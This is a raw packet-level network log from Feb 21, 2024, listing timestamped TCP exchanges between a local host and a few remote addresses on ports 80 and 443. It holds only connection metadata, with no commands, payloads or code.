                                                                                                                                                    Feb 21, 2024 08:14:06.726073980 CET44349714142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:06.762866974 CET49713443192.168.2.523.51.58.94
                                                                                                                                                    Feb 21, 2024 08:14:06.762939930 CET4434971323.51.58.94192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:06.818418980 CET49714443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.298660994 CET44349714142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.298744917 CET49714443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.298764944 CET44349714142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.298787117 CET44349714142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.298845053 CET49714443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.302582979 CET49714443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.302601099 CET44349714142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.306322098 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.306416988 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.306521893 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.306952000 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.306986094 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.498672962 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.501863956 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.501894951 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.502350092 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.503202915 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.503293991 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.503926992 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.549909115 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.639350891 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:07.713249922 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.713296890 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.713337898 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.713367939 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.713393927 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.713407040 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.713447094 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.714665890 CET49715443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.714680910 CET44349715142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.788813114 CET49717443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.788866997 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.788949013 CET49717443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.789504051 CET49717443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.789519072 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.854590893 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.854693890 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:07.856656075 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:07.975562096 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.976104975 CET49717443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.976130962 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.976474047 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.976851940 CET49717443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:07.976914883 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:07.977243900 CET49717443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:08.021915913 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.071790934 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072309971 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072328091 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072341919 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072357893 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072375059 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072390079 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072449923 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.072527885 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072550058 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072559118 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072590113 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.072599888 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.072685003 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.180248022 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.180418968 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.180495977 CET49717443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:08.181936026 CET49717443192.168.2.5142.250.65.228
                                                                                                                                                    Feb 21, 2024 08:14:08.181952953 CET44349717142.250.65.228192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287698030 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287718058 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287730932 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287761927 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287772894 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.287810087 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.287838936 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287880898 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287910938 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287940025 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.287950039 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.287992954 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.288011074 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288091898 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288105011 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288120985 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288145065 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.288167000 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288173914 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.288203001 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288225889 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288264990 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288279057 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.288310051 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288312912 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.288324118 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288356066 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.288360119 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288399935 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.288489103 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503081083 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503113031 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503129959 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503143072 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503158092 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503170967 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503184080 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503197908 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503237009 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503237009 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503242970 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503257036 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503312111 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503324986 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503336906 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503348112 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503365993 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503390074 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503446102 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503446102 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503515959 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503528118 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503540039 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503552914 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503571987 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503575087 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503587961 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503591061 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503603935 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503639936 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503664970 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503664970 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.503681898 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503695965 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503868103 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.503928900 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.504045010 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.504240990 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.504252911 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.504272938 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.504287004 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.504318953 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.504337072 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.509380102 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509397984 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509411097 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509424925 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509438992 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509453058 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509465933 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509469986 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.509469986 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.509494066 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509506941 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509520054 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.509548903 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.509548903 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.509634018 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.718322992 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718426943 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718444109 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718456030 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718496084 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718508959 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718534946 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.718558073 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718610048 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718616009 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.718631029 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718657970 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.718658924 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718733072 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718755007 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718775034 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718816996 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.718818903 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718831062 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.718858004 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718872070 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718884945 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718902111 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.718964100 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718976974 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.718988895 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719012976 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719012976 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719012976 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719027996 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719039917 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719063044 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719085932 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719099998 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719113111 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719139099 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719139099 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719153881 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719203949 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719230890 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719250917 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719269037 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719326019 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719382048 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719414949 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719433069 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719489098 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719491959 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719505072 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719533920 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719584942 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719635963 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719664097 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719679117 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719690084 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719708920 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719721079 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719748020 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719832897 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.719885111 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719907045 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719930887 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.719969988 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720012903 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.720041037 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720093966 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.720161915 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720217943 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720232010 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720374107 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720395088 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720410109 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.720452070 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720458984 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.720513105 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720539093 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720552921 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720588923 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720617056 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.720617056 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.720629930 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720643044 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720654964 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.720710993 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.720710993 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.724666119 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.724679947 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.724842072 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.724857092 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.724911928 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.724925041 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.724972010 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.724984884 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725013971 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725054979 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725058079 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.725081921 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.725131035 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725143909 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725163937 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725177050 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725213051 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725244045 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725244045 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.725378036 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725392103 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725404024 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725435972 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725446939 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.725446939 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.725446939 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.725456953 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.725711107 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.933763981 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.933825970 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.933893919 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.933936119 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.933957100 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934001923 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934041977 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934045076 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934094906 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934156895 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934191942 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934201002 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934259892 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934281111 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934303999 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934330940 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934355974 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934422016 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934434891 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934509993 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934639931 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934650898 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934701920 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934760094 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934779882 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934797049 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934828043 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934851885 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.934917927 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934931040 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.934988022 CET4971680192.168.2.55.101.153.86
                                                                                                                                                    Feb 21, 2024 08:14:08.935010910 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.935077906 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.935144901 CET80497165.101.153.86192.168.2.5
                                                                                                                                                    Feb 21, 2024 08:14:08.935185909 CET80497165.101.153.86192.168.2.5
